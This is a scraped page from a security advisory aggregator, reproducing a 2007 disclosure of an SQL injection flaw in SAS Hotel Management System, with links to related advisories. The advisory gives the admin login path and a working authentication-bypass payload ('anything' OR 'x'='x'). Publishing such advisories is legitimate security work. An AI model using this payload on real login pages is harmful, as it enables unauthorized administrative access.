Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) CA.View/view-law.asp/view-info.asp sql injection Education_info/edu_vi ew.asp sql injection Shoutbox 1.0 Remote Command Execution Vulnerability Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability From:Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net> Date:10.08.2007Subject:[Aria-Security.net] SAS Hotel Management System SQL Injection__________________________ A R I A - S E CU R I T Y ___________________________ SAS Hotel Management System SQL Injection http://www.sellatsite.com/sellatsite/hotel.asp Explanation: http://path/admin/admin.asp Username: anything' OR 'x'='x password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-security.net http://outlaw.Aria-Security.net/ [PERSONAL BLOG]
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
CA.View/view-law.asp/view-info.asp sql injection
Education_info/edu_vi ew.asp sql injection
Shoutbox 1.0 Remote Command Execution Vulnerability
Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability
